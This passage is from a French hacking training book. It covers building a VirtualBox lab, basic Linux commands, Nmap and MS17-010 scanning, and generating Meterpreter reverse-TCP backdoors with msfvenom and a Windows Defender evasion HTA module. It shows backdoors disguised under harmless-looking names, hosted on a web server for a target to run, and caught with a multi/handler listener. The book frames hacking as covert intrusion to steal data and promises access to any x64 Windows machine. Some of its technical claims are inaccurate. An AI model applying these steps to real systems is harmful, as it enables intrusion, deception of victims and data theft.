• Aucun résultat trouvé

CE LIVRE EST 90% PRATIQUE ET EST FAIT POUR TOUS CEUX QUI VEULENT ETRE DES HACKEURS PROFESSIONNELS

N/A
N/A
Protected

Academic year: 2022

Partager "CE LIVRE EST 90% PRATIQUE ET EST FAIT POUR TOUS CEUX QUI VEULENT ETRE DES HACKEURS PROFESSIONNELS"

Copied!
59
0
0

Texte intégral

(1)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 1

10 millions d’exemplaires

vendus dans le monde

CE LIVRE EST 90% PRATIQUE ET EST FAIT POUR TOUS CEUX QUI VEULENT ETRE DES HACKEURS PROFESSIONNELS

MAIZAN KOUAME MELCHISEDEK

HACKER

(2)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 2

CHAPITRE : I. LAB

II. GENERATION DE BACKDOOR III. SCAN

IV. PIRATAGE SIMPLE V. POST-EXPLOITATION

VI. ETRE ADMINISTRATEUR DE SYSTEME VII. RECUPERATION D’ACCES DE LA CIBLE VIII. REDESKTOP

IX. PESISTANCE X. EFFACE LES TRACES

(3)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 3

LIEN :

KALI LUNUX : https://www.kali.org/get-kali/#kali-virtual-machines

WINDOWS 10 : https://telecharger.malekal.com/download/windows-10-20h2- octobre-2020-x64/#

WINDOWS 7 :https://telecharger.malekal.com/download/iso-windows-7-pro-64- bits/#

WINDOWS 8 : https://telecharger.malekal.com/download/iso-windows8-64-bits/#

(4)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 4

CHAPITRE I : LAB DEFINITION

Un lab ou un laboratoire est un local pour faire des recherches scientifiques.

Le laboratoire est un local que nous allons mettre en place pour faire des recherches et des tests.

Pour le fonctionnement du laboratoire nous allons faire quelques installations :

Windows et linux pour que tout soit prêt a l’utilisation. Cela est très important car nous avons besoin de mettre en pratique les enseignements donnes pour le

perfectionnement de tous les étudiants.

INTSALLATION DE VIRTUAL BOX ET DES MACHINES VIRTUELS

Une machine virtuelle est un environnement virtualisé qui fonctionne sur

une machine physique. Elle permet d'émuler un OS sans l'installer physiquement sur l'ordinateur. L’installation de machine virtuelle se fait grâce à un hyperviseur.

Un hyperviseur, également appelé moniteur de machine virtuelle, est un processus qui crée et exécute des machines virtuelles sur une machine hôte.

Dans ce livre nous allons utiliser Virtual box qui est un hyperviseur.

NB : Assurez-vous d’avoir téléchargé les iso de Windows 7, 8 et 10

Passons à l’installation de Virtual box.

1- Aller sur www.virtualbox.org

2- Cliquez sur Download Virtual Box (Télécharger Virtual Box)

(5)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 5

3- Cliquez sur Windows hosts. Sous le titre Virtual Box 5.2.8 Platform packages, vous trouverez ce lien en bleu. Le fichier exécutable d'installation (EXE) de Virtual Box est alors en voie de transfert sur votre disque dur.

4- Ouvrez le fichier exécutable Virtual Box EXE. Retrouvez le fichier exécutable (dans le dossier Téléchargements), puis cliquez deux fois dessus. L'installation

de Virtual Box peut alors commencer.

5- Lisez et suivez les instructions. Opérez exactement comme suit :

 Cliquez sur Suivant sur les trois premières pages,

 Cliquez sur Oui au moment voulu,

 Cliquez sur Installer,

 Cliquez sur Oui au moment voulu.

(6)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 6

6- Cliquez finalement sur Installer. Virtual Box commence alors son installation sur votre disque dur

7- Cliquez sur Terminer. Le bouton est en bas et à droite de la fenêtre. La fenêtre d'installation disparait d'elle-même et Virtual Box s'exécute. Vous êtes à présent en mesure de créer votre machine virtuelle, laquelle vous permettra de faire tourner n'importe quel système d'exploitation sur votre ordinateur.

8- Allez sur votre oracle Virtual box

(7)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 7

9- Cliquez sur Nouveau ou new. Pour faciliter la tâche, un assistant d'installation s'affiche à l'écran : il vous suffit alors de suivre les différentes instructions qui apparaissent dans l'ordre.

10- Mettez le nom du système que vous désiriez installer et le type : si c’est un Windows assurez-vous que vous aviez choisi « Microsoft Windows » si vous voulez-installez un kali linux ou un système linux choisissez le type « linux »et les

« versions Windows (7 ou 8 ou 10) et l’architecture 32 ou 64 bit ».

11- Augmente les mémoires et la rame

(8)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 8

12- Next ou suivant du début jusqu’à la fin

13- Créer le disque

(9)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 9

(10)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 10

INSTALLATION AVEC ISO

1- VOUS VERREZ VOTRE MACHINE PREINSTALLER 2- Cliquer sur démarrer

3- Cliquer sur l’icône explorer

4- Cliquer sur « ajouter »

(11)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 11

5- Etant dans votre dossier choisissez le système selon le type et l’architecture choisie au préalable puis cliquer sur « ouvrir ».

6- Cliquer sur choisir puis sur démarrer

(12)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 12

7- Cliquer sur « suivant » pour poursuivre l’installation

8- Cliquer sur « installer maintenant » pour lancer l’installation

(13)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 13

9- Accepte les termes et clique sur suivant

10- Veuillez choisir la deuxième option « personnalisée (options avancée) »

11- Choisissez le « Windows professionnel » 12- Cliquer sur « suivant »

(14)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 14

13- L’installation se fera jusque la fin 14- La machine redémarrera plusieurs fois

15- Mettez le nom de la machine qui vous sera demande pour terminer 16- Cliquez sur « suivant »

17- Cliquez sur « paramètre recommande »

18- Votre machine est installée, les mêmes pratiques marcheront avec toutes vos machines Windows virtuels

(15)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 15

INSTALLATION AVEC KALI LINUX « TRES IMPORTANT POUR LES DIFFERENTS COURS » Assurer vous d’avoir téléchargé l’iso de kali linux

1- Cliquez sur « nouvel »

2- Ensuite écrivez le nom « kali linux »

3- Choisissez une version « Debian (64 bit) » car votre iso doit être un (64 bit) pour la formation.

4- Choisir le type « linux »

5- Cliquez sur « suivant » jusqu’à la fin

INSTALLATION AVEC L’ISO 1- Une fois le disque créé cliquez sur « démarrer » 2- Cliquer sur « explorer »

(16)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 16

3- Cliquez sur « ajouter »

4- Choisissez votre « système » 5- Puis cliquer sur « choisir » 6- En suite sur « démarrer »

(17)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 17

7- Choisissez « Graphical Install »

8- Options de langue si vous êtes francophone choisissez « french »

9- Puis cliquez « continuer » plusieurs fois jusqu’à atteindre « Les serveurs de noms … vide.»

10- Cliquez encore sur « continuer »

(18)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 18

11- Cliquez sur continuer jusqu’à atteindre « le nom de la machine … ce que vous voulez. »

12- Laissez le nom « kali » puis cliquez sur « continuer »

13- Cliquez sur « continuer »

14- Mettez un nom alphanumérique de préférence puis cliquez sur continuer,

exemple : « kali1 »

15- Cliquez sur « continuer »

(19)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 19

16- Mettez un nom alphanumérique diffèrent du précèdent, exemple : « kali12 »

17- Mettez un mot de passe et la confirmation du mot de passe

18- Cliquez sur « continuer »

(20)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 20

19- Cliquez « continuer »

20- Cliquez sur « continuer »

21- Cliquez sur « continuer »

(21)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 21

22- Cliquez sur « oui » 23- Puis sur « continuer »

24- Cliquez sur « gnome »

25- puis sur « continuer » et l’installation des logiciels se fera seul

26- Cliquer sur continuer

(22)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 22

27- Cliquez sur « oui » et sur « continuer »

28- Choisissez la « deuxième option »

29- puis sur « continuer »

30- Installation terminer kali est prêt, tapez « continuer » pour terminer

(23)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 23

31- Bienvenue sur kali, entrer votre mot de passe

32- Interface de kali linux

Maintenant que les installations sont terminées nous allons commencer la manipulation de base de kali linux au chapitre suivant.

(24)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 24

CHAPITRE II : MANIPULATION DE BASE DE LINUX

1. QU’EST- CE QUE LE SYSTEME LINUX 2. QUELS SONT LES LOGICIELS DE KALI

3. QUEL EST L’OUTIL QUI SERA UTILISE DANS CE COURS

4. PRE-REQUIS OU MANIPULATION DE BASE AVANT L’UTILISATION DE NOTRE OUTIL DE PERFORMANT.

1- Qu’es ce qu’un système linux

Un système linux est un système d’exploitation dédié aux hackers, et ce système est open source c’est-à-dire : un système sans licence.

2- Quels sont les logiciels de kali qui sont intégrés dans un linux : kali linux

Il existe une panoplie de logiciels intégrée dans kali linux : nmap ; msfconsole ; bully ; arping etc…

Sachez que ces logiciels-là sont des logiciels utilisés dans le cyber sécurité, chaque

logiciel a un rôle bien précis qu’il joue. Exemple : « aircrack-ng permet à un pirate d’avoir les accès d’un wifi, nmap permet à un pirate de scanner un réseau lorsqu’il réussit à pénétrer le réseau ».

REMARQUE : chaque outil a son rôle bien précis.

3- QUEL EST L’OUTIL QUI SERA UTILISER DANS CE COURS

L’outil que nous allons utiliser est un outil multi tâche qui est utilisé ou qui est le plus utilisé chez les pirates de toute catégorie c’est-à-dire « de débutant à expert en sécurité informatique ».

Cet outil- là se nomme : METASPLOIT. C’est avec cet outil que nous allons travaillez tout au long de ce livre pratique.

(25)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 25

Metasploit regorge de nombreux outils pour pentest, social ingénierie, exploit zéro Day etc. … il est l’outil le plus complet et utilisé dans les cybers attaque également.

4- PRE-REQUIS OU MANIPULATION DE BASE AVANT L’UTILISATION DE NOTRE OUTIL DE PERFORMANCE.

Nous appelons base de linux les commandes qu’un hacker doit connaitre, sans cela il lui sera difficile de comprendre les pratiques du cours. Grâce à ces commandes vous aurez la base qui facilite la compréhension des cours du présent livre.

Les commandes de base de linux qui vous seront montrées seront les plus essentielles à connaitre.

a. Terminal

Avant de commencer les bases il faut au préalable connaitre un terminal dans kali car tout se fera avec le terminal.

Par définition un Terminal est un programme qui permet à un utilisateur d’interagir avec le Shell.

Consigne : cliquez deux fois sur le terminal de votre kali linux.

b. Présentation du terminal

Voici comment un terminal de linux s’affiche, le « $ » veut dire que nous n’avons pas plein autorité sur le terminal donc sur kali linux. Mais nous allons voir comment avoir la pleine autorité sur kali linux.

(26)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 26

c. Commande (1) de kali linux : « pwd »

Le «pwd »est une commande qui permet de savoir où vous vous trouvez à l’ instant. Si vous le tapez dans kali, il vous permet de connaitre le chemin où vous vous trouvez dans kali linux.

d. Commande (2) de kali linux : « ls »

La commande « ls » est une commande de kali qui vous permet de pouvoir afficher les dossiers ou lister le contenu du chemin où vous vous trouvez.

e. Commande : « cd »

La commande « cd » est une commande de kali linux qui permet à un utilisateur d’accéder à un dossier, exemple : « cd Bureau a permis à l’utilisateur d’accéder au dossier Bureau de kali linux ». Aussi la commande « cd + nom du dossier » vous permet de vous déplacer de votre position à une autre ou d’un dossier à un autre dossier dans kali.

(27)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 27

f. La commande « dir »

La commande « dir » Permet à un utilisateur de lister ou d’afficher le contenu d’un dossier il joue un peu le rôle de la commande « ls ».

g. La commande : « cd .. »

La commande « cd .. » vous permet de quitter du dossier dans lequel vous étiez et revenir dans le dossier précèdent. Exemple : « nous sommes quittés du dossier bureau dans lequel nous étions avec un « cd .. ».

(28)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 28

h. La commande : « mkdir »

La commande « mkdir + le nom du dossier » vous permet de créer un dossier qui portera le nom que vous avez mis après avoir tapez « mkdir ».

Le dossier GSI a été créé avec succès.

i. La commande : « rmdir »

La commande « rmdir + nom du dossier » supprime le fichier dont vous avez spécifié le nom. Exemple : « rmdir gsi » nous constatons que gsi qui avait été créé avec « mkdir » a été supprimé.

j. La commande : « cp »

La commande « cp -r + pwd du dossier à copier + pwd du dossier qui reçoit la copie » ou

« cp -r + chemin du dossier à copier + chemin du dossier qui reçoit la copie ». Exemple : nous avons copié le dossier « Bureau » dans le dossier « Téléchargements ».

k. La commande « clear »

(29)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 29

La commande « clear » vous permets de nettoyer le terminal.

j. La commande : « sudo su ou sudo -s »

La commande « sudo su » vous permet de passer en super utilisateur donc avoir le plein droit sur votre système kali linux.

NB : après avoir tapez la commande Mettre son mot de passe même si elle est invisible.

REMARQUE : Vous verrez le symbole « $ » en « # » ce symbole « # » une fois afficher confirme que vous êtes en super utilisateur.

k. La commande « exit »

Cette commande vous permet de quitter le super utilisateur et également si vous le retapez il vous permet de quitter le terminal.

Voici les bases les plus essentielles à connaitre et à maitriser avant la poursuite de la formation.

(30)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 30

CHAPITRE II : SCAN DE VULNERABILITE Définition

Un scan de vulnérabilité est un programme conçu pour identifier des vulnérabilités dans un système d’exploitation ou un réseau informatique.

Avant de faire un scan de vulnérabilité : Parlons du réseau sur Virtual box. Il y a deux moyens de travailler en réseau « un réseau ou vous n’avez pas besoin de connexion et un réseau ou vous avez besoin de connexion pour mieux faire le travail ».

RESEAU NAT : configurer le réseau d’une machine en « réseau nat » c’est permettre à cette machine de recevoir (Windows) ou d’émettre (kali linux) des attaques

informatiques sans connexion mais en local pour vos tests.

ACCES PAR PONT : configurer le réseau d’une machine en accès par pont c’est permettre à cette machine de recevoir (Windows) ou d’émettre (kali linux) des attaques

informatique avec la connexion et cela peut se faire à distance.

CONFIGURATION PRATIQUE DE VOTRE RESEAU OU LAB : a- Cliquez sur votre machine à configurer :

b- Cliquez sur configuration

(31)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 31

c- Cliquez sur RESEAU , puis sur RESEAU NAT « pour travailler sans connexion » d- ou ACCES PAR PONT « pour travailler avec la connexion »

e- Cliquez sur OK pour valider

Voici

comment vous pouvez faire la configuration de votre réseau pour travailler sans problème avec aisance.

NB : Assurez-vous de mettre toutes vos machines dans le même réseau c’est-à-dire si

« votre kali linux est en réseau nat mettez également toutes vos Windows en réseau nat ».

PASSONS MAINTENANT AU SCAN DE VULNERABILITE :

a- Cliquez sur démarrer de votre « kali linux et un de vos Windows »

NB : Une fois votre kali linux et votre machine Windows lancés, nous commencerons par désactiver les pare - feux de Windows activés :

a- Tapez dans recherche « panneau de configuration» puis OK et cliquez sur SYSTEME ET SECURITE.

(32)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 32

b- Cliquez sur « Pare-feu Windows »

c- Cliquer sur « ACTIVER OU DESACTIVER LE PARE-FEU WINDOWS »

(33)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 33

d- Cliquer sur « Désactiver le pare-feu » puis valider avec OK.

Nous allons faire le scan avec notre machine kali linux.

e- Allez sur le terminal de votre kali linux

f- Puis passez en « root » c’est-à-dire en mode « super utilisateur »

Nous allons exploiter un outil de kali linux qui se nomme : NMAP et DB_NMAP

(34)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 34

NMAP est un outil qui permet de scanner un réseau informatique, de trouver des

vulnérabilités ou des portes ouvertes sur les machines connectées au réseau, voir même donner la faciliter à un pirate de trouver des failles. NMAP est considéré comme un outil perfectionné en hacking pour le scannage. NB : il y a d’autres outils également très perfectionnés.

Dans ce cours nous utiliserons pour commencer : NMAP

g- Faites ces configurations avant de commencer sur kali linux et exploiter ses ressources.

 Activez le service « APACHE2 »

 Activez le service « postgresql et msfdb »

h- NMAP

Pour avoir de l’aide pour mieux explorer un module dans kali, mettez le nom de l’application et mettez ceci : « -h » donc nous allons mettre « nmap -h pour voir les différentes options que nous avons pour mieux exploiter nmap et ses ressources »

(35)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 35

 Apres avoir mis cette commande vous allez voir une panoplie d’options devant vous, ce que vous pouvez exploiter seul chez vous pour avoir des expériences. Nous allons utiliser quelques commandes les plus utilisées en pentest pour scanner.

 « nmap -o + plage d’adresse IP »

La plage d’adresse IP, ou sous-réseau, regroupe des adresses IP publiques consécutives.

Pour déterminer la plage d’adresse IP il faut simplement :

Connaitre les différents types de classe d’adresse, il existe cinq (5) types de classe d’adresse mais nous verrons les 3 essentielles :

Classe A : le premier octet a une valeur comprise entre 1 et 126 ; soit un bit de poids fort égal à 0 « masque : 255.0.0.0 ; adresses réseau : 1.0.0.0 – 126.255.255.255 ; « /8 » ».

Classe B : le premier octet a une valeur comprise entre 128 et 191 ; soit 2 bits de poids fort égaux à 10 « masque : 255.255.0.0 ; adresse réseau : 128.0.0.0 – 191.255.255.255 ;

« /16 » ».

Classe C : le premier octet a une valeur comprise entre 192 et 223 ; soit 3 bits de poids fort égaux à 110 « masque : 255.255.255.0 ; adresse réseau : 192.0.0.0 –

223.255.255.255 ; « /24 » ».

Vous comprendrez plus dans la pratique pourquoi il faut connaitre ce petit principe.

Vous devez taper « ifconfig » cette commande est pour connaitre votre adresse IP.

C’est écrit « broadcast : 10.10.1.255 et netmark : 255.255.255.0 » cela correspond à la classe C donc lors du scan nous allons scanner le réseau avec « 10.10.1.0/24 » nous allons changer le « 255 » du broadcast en « 0 » et ajouter un « /24 » à la fin.

Cela nous permettra de scanner et de trouver tous ceux qui sont dans le réseau.

(36)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 36

Vous ajoutez mettez la commande selon votre adresse IP « assurer vous de mettre à la fin de l’IP soit 0 ou 1 ».

Dans la pratique le scanner vous envoie des informations exactes sur tous ceux qui sont dans le même réseau.

Le scanner avec la commande m’a permis de connaitre l’adresse IP d’une cible et le type de système qu’utilise la cible sans même toucher la machine.

Nous avons également d’autres options que nous allons explorer :

 « db_nmap –A –Ss –v + plage d’adresse IP »

Vous pouvez également mettre cette commande ; elle également va scanner tous ceux qui se trouvent dans votre réseau et de voir si une machine est lié à une adresse IP. Si oui elle affichera automatiquement le port ou le port et l’adresse IP de la machine.

Résultat : tous ceux qui sont encadrés en vert sont des adresses IP qui n’ont pas de machines liées à eux et tous ceux qui sont en rouge sont des adresses IP qui sont liés à des machines.

(37)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 37

Le résultat du scan est celle-ci.

Nous continuons avec une autre commande qui est :

 « db_nmap –h »

Db_nmap a les même options que nmap sur le terminal, la particularité de db_nmap est que on ne l’utilise que sur « MSFCONSOLE ». Db_nmap est aussi un scanner de kali linux qui permet de scanner un réseau informatique.

NB : Avant de pouvoir utiliser la commande il faut lancer Metasploit « MSFCONSOLE »

Puis vous tapez la commande « db_nmap –h » et validez :

(38)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 38

Apres avoir mis la commande vous aurez une panoplie d’options devant vous comme

nmap, à vrai dire ce sont les mêmes commandes et les mêmes options.

Nous utiliserons une de ces commandes avec db_nmap :

Ce sont les mêmes commandes que nmap mais utilisés avec db_nmap donnera le même résultat.

Résultat

(39)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 39

« scanner/smb »

« Le scanner/smb » est un module de « metasploit » qui permet de scanner un réseau sur précisément les vulnérabilité « smb » des machines Windows 7,8 ,10 dans un réseau.

Ce scanner est rapide et efficace et il nous sera d’une très grande utilité dans ce livre.

 Pour chercher un module dans metasploit ou msfconsole, nous utilisons la commande « search + nom du module ». Pratique :

« Search scanner/smb » nous a permis de trouver tous les scanner/smb de Metasploit.

Ici pour charger un module ou pour utiliser un module dans msfconsole ou Metasploit, nous utilisons deux types de moyens : « use + indice (1ou 2 ou 10 ou 13 etc…) ou use + nom complet du module ».

Pratique (le scanner qui nous intéresse est ici l’indice 12

« auxiliary/scanner/smb/smb_ms17_010 ») :

(1) Pour l’utilisez-vous devez mettre « use + indice (12) ».

(2) Pour l’utiliser vous devez mettre « use + auxiliary/scanner/smb/smb_ms17_010 » Vérifiez les options en tapant « options » :

(40)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 40

Sachez ceci :

(1) Dans cet options nous ne changerons le « THREADS » le THREADS est la rapidité du scanner ; nous allons améliorer cela.

(2) Dans cette option nous ajouterons dans « RHOSTS » la plage d’adresse à scanner.

NB : Dans le RHOSTS on n’ajoute soit la plage d’adresse IP ou une adresse IP cible déjà scanner.

(3) Pour changer ou charger (ajouter) un module ; vous devez mettre « set » Pratique :

Voici comment vous devez changer ou améliorer les options d’un module avec la commande « set ». Vous pouvez ajouter dans « rhosts » la plage d’adresse IP pour scanner tout le réseau.

 Enfin pour exécuter la commande vous devez utiliser la commande (run ou exploit).

(41)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 41

La commande « run ou exploit » vous permet de mettre le module en action et cela vous ramènera des machines ou toutes les machines vulnérables à la faille ms17_010.

Consigne : Le scanner de vulnérabilité est très essentiel pour tout hacker donc vous devez maitriser cela avant de passer au cours suivant.

(42)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 42

Chapitre III : GENERATION DE BACKDOOR

a- DEFINITION

Un backdoor est également appeler charges utiles ou payload malveillant, ce sont des éléments de cyberattaques qui provoquent des dégâts « ils permettent à un pirate d’accéder à des ordinateurs ». Un payload ou backdoor permet aux pirates de pouvoir faire :

 Des vols de données

 Une surveillance des activités de la cible atteint

 L’affichage de publicités

 La suppression ou la modification de fichiers

 Le téléchargement des fichiers

 L’exécution de processus en arrière-plan

Backdoor ou payload ou charge utile sont les plus utilisés en cyberattaque pour pénétrer des systèmes.

Dans ce cours nous verrons comment créer des backdoors.

b- Création de payload ou backdoor avec msfvenom

 Définition

Msfvenom est un logiciel du Framework metasploit, il permet de générer, encoder des payloads.

 Utilisation de msfvenom

Pour savoir comment utiliser msfvenom vous devez mettre la commande : « msfvenom –h ».

Vous aurez automatiquement les options pour l’utilisation du module et également une aide.

(43)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 43

L’encadrement ci-dessus est l’aide idéal presque complète pour générer un backdoor. Et les options qui sont en dessous permettent de pouvoir encoder, choisir l’architecture et le format nécessaire.

 Créons un backdoor pour Windows « architecture x64 »

Ce backdoor nous permettra de pirater n’importe quel système Windows en architecture « x64 ».

Pour créer un backdoor en architecture « x64 », vous devez :

 Spécifier le payload : Windows/x64/meterpreter/reverse_tcp : le payload permet de créer une connexion entre la machine victime et celle de la machine attaquante.

 Spécifier un port : le port est le numéro unique codée sur 16bits qui permet l’écoute sur la machine cible NB : choisissez le port que vous voulez si vous n’êtes pas en porforwarding avec un vpn.

 Spécifier un IP : l’ip est l’adresse IP numéro d’identification de chaque appareil connectée à un réseau utilisant le protocole internet « celui- ci doit être celui de votre « IP » kali linux ou du « IP » vpn utiliser par votre kali linux ».

 Spécifier le chemin de sortie en spécifiant l’extension : l’extension pour pirater un système Windows est en « Exe ».

Cherchons notre ip : pour trouver votre ip sur kali linux, vous devez tapez dans votre terminal : « IFCONFIG ».

Cherchons notre chemin de sortie : nous le trouvons avec « pwd ».

(44)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 44

Pour mettre le backdoor sur le bureau il faut accéder au bureau avec « cd Bureau » et en suite mettre le « pwd » pour avoir le chemin.

FAISONS SORTIRE NOTRE BACKDOOR MAINTENANT.

X64 :

Une fois dans :

 Avoir mis dans LHOST votre adresse ip

 Vous mettez le chemin de sortie du backdoor sur le bureau

 Puis mettez le nom du backdoor « selon votre choix » mais en « .Exe ». Exemple : backdoor.exe ; pdf.exe ; chaussure.exe ; etc …

 Puis exécuter la création en appuyant sur : « ENTRER OU ENTER ».

X86

Pour les architectures 32 bits ou x86 nous enlevons seulement le x64 du payload et c’est tout. Cela vous permet de pirater tous les systèmes en x86 bits.

c- Création de backdoor avec metasploit « msfconsole ».

 Définition de metasploit « msfconsole »

Metasploit pen testing tool, est un projet (open source) en relation avec la sécurité informatique. Son but est de fournir des informations sur les vulnérabilités du système

(45)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 45

informatique et d’aider à la pénétration et au développement de signatures pour les systèmes de détection d’intrusion (IDS ; Intrusion Détection System).

 Modules Exploits

C’est des scripts en Ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable sans la toucher.

 Modules Payloads

C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de non seulement pénétrer le système mais également contrôler la machine d’une victime.

 Modules auxiliary

C’est des modules utilises pour diverses taches comme scan de port, sniffing, scan services. Une fois l’exploit et le payload exécutés sur une machine vulnérable a une faille, on peut faire ce qu’on veut sur le système comme télécharger les données de la cible, mise en place d’un malware, capture de frappe, etc … .

 Modules évasion

Sont des nouveaux modules qui sont conçus pour aider à créer des charges utiles ou backdoor qui peuvent échapper aux logiciels antivirus (AV) sur le système cible.

 Modules encodeurs

Sont de code qui permette d’échapper aux anti-virus.

 Modules post

Sont des scripts qui permettent d’exploiter une session après piratage.

(46)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 46

Tous ces modules seront explorés dans ce cours.

Continuons avec la création de backdoor.

 Nous allons utiliser un module d’évasion pour la création de backdoor « évasion ».

Pour trouver le module de backdoor en hta d’évasion, vous devez tapez « search evasion ». Cela vous donnera une panoplie de backdoor dit indétectable « ce qui n’est pas totalement vrai ».

Pour utiliser un module nous devons tapez « use + nom du module ou use + indice du module ».

Passons à la pratique :

(47)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 47

Pour faire notre backdoor nous allons utiliser un module qui a pour nom :

« evasion/Windows/windows_defender_js_hta » et pour indice : « 6 ».

Pour l’utilisation du module pour créer notre backdoor, nous devons mettre : « use evasion/Windows/windows_defender_js_hta ou use 6 ». Voici comment on utilise un module.

 Une fois après avoir spécifié le module que nous allons utiliser nous allons maintenant voir les options de ce module pour générer un backdoor.

Nous allons remplir les options suivant :

 FILENAME : « nom que vous voulez et extension hta. Exemple : SUCCES.hta ; microsft.hta etc... »

 LPORT : « le port de votre choix entre 1 et 1000 »

 LHOST : votre adresse IP avec « ifconfig ».

 Exécuter le module avec : « run ou exploit »

 Mettre le backdoor sur le bureau ; il faut juste appliquer la pratique des chemins

« pwd ».

Pour remplir ces options voici comment on procède :

(48)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 48

Le backdoor est maintenant sur le bureau de kali linux. Vérifions :

Nous venons de mettre ou de créer un backdoor en architecture x64 bits.

Ce backdoor ne nous permet que de pirater les Windows x64 ou 64bits.

Apres avoir appris à créer un backdoor ou payload ou charge utile. Vous avez

maintenant la capacité de faire le piratage de système. Dans le prochain chapitre nous aurons à faire le piratage de système.

(49)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 49

CHAPITRE VIII : HACKING « PIRATAGE SIMPLE »

DEFINITION

Le hacking ou piratage est une pratique qui consiste à s’introduire indument dans le système d’un tiers sans se faire remarquer pour modifier le contenu et l’organisation, voler des données etc … de la personne.

 PROCEDURE POUR HACKER UN SYSTEME OU UN ORDINATEUR Il existe différent type de procédure pour hacker un système ou un ordinateur. Nous allons utiliser d’abord la procédure la plus utilisée par les pirates et qui est valable à 100%.

LE HACKING OU PIRATAGE AVEC BACKDOOR EXECUTER PAR LA CIBLE.

 DESACTIVER L’ANTI-VIRUS DE VOTRE MACHINE WINDOWS (cible) DE VIRTUALBOX

 ALLEZ SUR VOTRE KALI LINUX, PUIS ALLEZ DANS LE DOSSIER FICHIER

(50)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 50

 Allez dans le dossier emplacement, puis dans le dossier ordinateur, puis dans le dossier var, ensuite dans le dossier www, enfin dans le dossier html « var/www/html » c’est un chemin très important à connaitre.

 Une fois sur votre terminal, faites la configuration « la configuration est très importante » pour faire les pratiques sans problème : activez postgresql et apache2 et msfdb.

 Nous passons à la création de backdoor avec lequel nous allons pirater tous les systèmes selon l’architecture du backdoor. Suivez et faite la pratique :

(51)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 51

La création de backdoor que nous venons de faire est un backdoor susceptible de pirater tous les Windows (x64) ou (64bits), et mettez le backdoor dans le dossier (var/www/html).

 Apres cela, nous passons au lancement de metasploit.

Dans les modules de metasploit nous utiliserons un module très important qui nous

permettra de contrôler et de faire tout le piratage avec metasploit, ce module ce nomme : « multi/handler ».

NB : Sans cela il est impossible de parler de piratage et cela nécessite que vous reteniez le port que vous avez utilisé lors de la création de backdoor.

 Nous utiliserons le module « multi/handler »

Le module multi/handler permet à un pirate d’écouter le port du backdoor lorsqu’il est exécuté et de lui envoyer une session.

IMPORTANT A SUIVRE ETAPE PAR ETAPE :

Passons à la configuration de multi/handler avant d’exécuter le backdoor :

(52)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 52

 Vous cherchez d’abord le module « multi/handler », avec la commande : « search multi/handler ». Le module « multi/handler » aura pour indice dans la plus part des kalis l’indice « 6 ».

 Vous utiliserez le module avec ceci : « use multi/handler OU use 6 »

 Chargé et prêt à l’utilisation nous allons le configurer dans les détails

